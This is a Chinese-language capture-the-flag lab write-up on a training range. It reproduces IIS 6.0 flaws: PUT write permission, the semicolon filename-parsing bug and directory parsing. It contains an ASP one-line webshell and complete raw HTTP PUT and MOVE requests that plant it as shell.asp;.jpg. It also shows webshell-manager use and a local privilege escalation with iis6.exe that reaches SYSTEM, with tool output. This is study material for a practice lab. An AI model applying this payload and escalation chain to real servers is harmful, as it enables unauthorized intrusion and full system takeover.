IIS6.0相关漏洞复现
IIS6.0相关漏洞复现
0x00 环境与教程
靶场环境
IIS写权限漏洞分析溯源_主机安全_在线靶场_墨者学院_专注于网络安全人才培养 (mozhe.cn)
参考
- IIS 6.0漏洞复现 - soapffz’s blog
- 题目2-IIS写权限漏洞分析溯源 - 腾讯云开发者社区-腾讯云 (tencent.com)
0x01 利用漏洞
- IIS PUT写权限漏洞
- IIS6 文件名解析漏洞
- IIS6 目录解析漏洞(顺带复现一下)
0x02 实操
PUT写权限漏洞
利用PUT写权限漏洞去上传ASP Webshell
<% eval request("cmd") %>
步骤一:PUT命令写txt文件
PUT /shell.txt HTTP/1.1
Host: 219.153.49.228:43068
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 25<% eval request("cmd") %>
步骤二:MOVE命令修改文件名,为IIS文件名解析漏洞做准备
MOVE /shell.txt HTTP/1.1
Host: 219.153.49.228:43068
Destination: /shell.asp;.jpg
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 25<% eval request("cmd") %>
步骤三:利用Webshell管理攻击连接一句话木马
我的蚁剑好像出了点小问题,这里使用哥斯拉连接
连接成功,执行一下命令试试
权限过低了
步骤四:提权
参考:(11条消息) 拿到webshell后虚拟终端拒绝访问_sudo0m的博客-CSDN博客
哥斯拉上传有点小问题,这边用菜刀上传
这里iislpe.exe
工具提权失败,还得是iis6.exe
Putter:网上找了好久都没找到免费资源,索性付费购买了一个,现在免费传上去,链接在此
结果最终还是找到了,iis6.exe
的下载链接与介绍:SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合 (github.com)
[*] 磁盘列表 [ C: ]c:\inetpub\wwwroot\> help # 菜刀的帮助命令设置终端路径: SETP c:\windows\system32\cmd.exe 或者 SETP /bin/sh
切换到根目录: ROOTc:\inetpub\wwwroot\> dir
[Err] 拒绝访问。c:\inetpub\wwwroot\> qweqwe # 注:这里输入不存在的指令也拒绝访问,说明需要指定cmd.exe
[Err] 拒绝访问。c:\inetpub\wwwroot\> SETP c:\inetpub\wwwroot\cmd.exe # 切换终端为我们上传的终端
设置终端路径为::c:\inetpub\wwwroot\cmd.exeC:\Inetpub\wwwroot 的目录 # 然后命令执行成功2022-08-30 14:37 <DIR> .
2022-08-30 14:37 <DIR> ..
2022-08-30 14:37 201,728 cmd.exe
2022-08-30 14:37 74,752 iis6.exe
2022-08-30 14:13 458,752 iislpe.exe
2013-07-05 04:05 843 iisstart.htm
2003-02-21 18:48 2,806 pagerror.gif
2022-08-30 14:05 25 shell.asp;.jpg
2022-08-30 14:10 284 shell.txt7 个文件 739,190 字节2 个目录 837,642,240 可用字节C:\Inetpub\wwwroot\> whoami # 当前权限为network
nt authority\network serviceC:\Inetpub\wwwroot\> iis6.exe "whoami" # 利用iis6.exe提权
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 1024 cmd.exe
[process walking]: 1320 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 1320
[Try 1 time...]
[Try 2 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: whoami
[+]Done, command should have ran as SYSTEM!
nt authority\system # 拿到了system权限
步骤五:构造IIS6 目录解析漏洞环境
步骤六:测试IIS6 目录解析漏洞
注意:本实验环境与这个漏洞无关,但是可以通过人为构造进行测试,如果想熟悉这个漏洞,可以尝试联系这个环境 → 内部文件上传系统漏洞分析溯源_文件上传_在线靶场_墨者学院_专注于网络安全人才培养 (mozhe.cn)
步骤七:提交flag
题目flag在这个位置
IIS6.0相关漏洞复现相关推荐
- metinfov5.0.4漏洞复现
metinfov5.0.4漏洞复现 最近学习,metinfov5.0.4漏洞复现,个人感觉这次的漏洞还是比较有意思的,为什么呢?原因是这次的3个漏洞都跟一个漏洞有关,这个漏洞就是变量覆盖覆盖漏洞. 简 ...
- PR、巴西烤肉、iis6.0提权复现
PR.巴西烤肉.iis6.0提权复现 大多数的时候,如果我们上传了一句话木马之后,想要进一步操作.比如,创建新用户,查看当前身份,这时会发现权限不够,当前的命令行只对网站当前目录下的文件具有操作权限, ...
- Xxe漏洞 php,PhpSpreadsheet 1.5.0 XXE漏洞复现及分析
0x01 前言 PhpSpreadsheet是一个非常流行的纯 PHP 类库,能够让你方便的读写Excel.LibreOffic Calc等表格格式的文件,是PHPExcel的替代者.2018年11月 ...
- 网站内容管理系统--CMS相关漏洞复现
cmseasy7.3.8–文件读取漏洞复现步骤 首先准备一套源码,搭建在phpstudy中. 在php中 Mysql中创建cmseay7数据库 3. 再将准备好的源码,解压放到网站根目录 登录后台 账 ...
- 【漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析
年后趁着需要做安全测试系统不多的这个空档,学学python到处逛逛复现复现和分析一些简单的漏洞 --from Lyricbao 0x00 复现环境 phpstudy wordpress 4.4版本 Q ...
- iis6.0解析漏洞
在 Windows 2003下 IIS 6.0有两个漏洞.以下是我在网上找的资料: IIS解析漏洞1: 在网站下建立文件夹的名字为 *.asp.*.asa 的文件夹,其目录内的任何扩展名的文件都被 I ...
- iis6.0 php漏洞,微软IIS 6.0和7.5的多个漏洞及利用方法
微软的IIS 6.0安装PHP绕过认证漏洞 微软IIS与PHP 6.0(这是对PHP5中的Windows Server 2003 SP1的测试) 详细说明: 攻击者可以发送一个特殊的请求发送到IIS ...
- 【漏洞复现】泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)
0x01 漏洞概述 泛微e-office是泛微旗下的一款标准的协同移动办公平台. 泛微e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行,攻击者可 ...
- IIS6.0,Apache低版本,PHP CGI 解析漏洞
IIS6.0解析漏洞 在IIS6.0下存在这样的文件"名字.asp;名字.jpg" 代表了jpg文件可以以asp脚本类型的文件执行. 根据这个解析漏洞我们可以上传这种名字类型的图片 ...
- [网络安全自学篇] 二十九.文件上传和IIS6.0解析问题及防御原理(二)
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步.前文分享了Sqlmap的基本用法.CTF实战,包括设置HTTP.POST请求.参数 ...
最新文章
- 把偷快递的贼炸到怀疑人生!不愧是 NASA 工程师,奇思妙想
- Mobile OpenCart 自适应主题模板 ABC-0074
- CoinU基本概念分享(什么是去中心化钱包、助记词丢失怎么办等)
- C语言的本质(3)——整数的本质与运算
- ActiveMQ网络连接
- linux中的acl权限,linux中的权限和ACL
- 【C++对象模型】第一章 关于对象
- 代码结构中Dao,Service,Controller,Util,Model意思和划分
- 使用FileReader对象的readAsDataURL方法来读取图像文件
- 箭头函数的this指向谁_你好,我是 JavaScript 的 this
- Ubuntu18.04配置Jupyter
- CNN网络:MINST数据集的练习
- [在线小说系统源码]精品微信小程序小说阅读器+后台管理系统|前后分离VUE[包运行成功]
- 盘点2022年最受欢迎的6大前端框架
- LabWindows图表显示
- 三菱plc指令dediv_三菱plc中的DECMP指令是什么意思?
- 21受限玻尔兹曼机RBM
- Python数据分析-pandas-数据处理
- 016.从中序与后序遍历序列构造二叉树
- springboot 的异步任务 :无返回值 和有返回值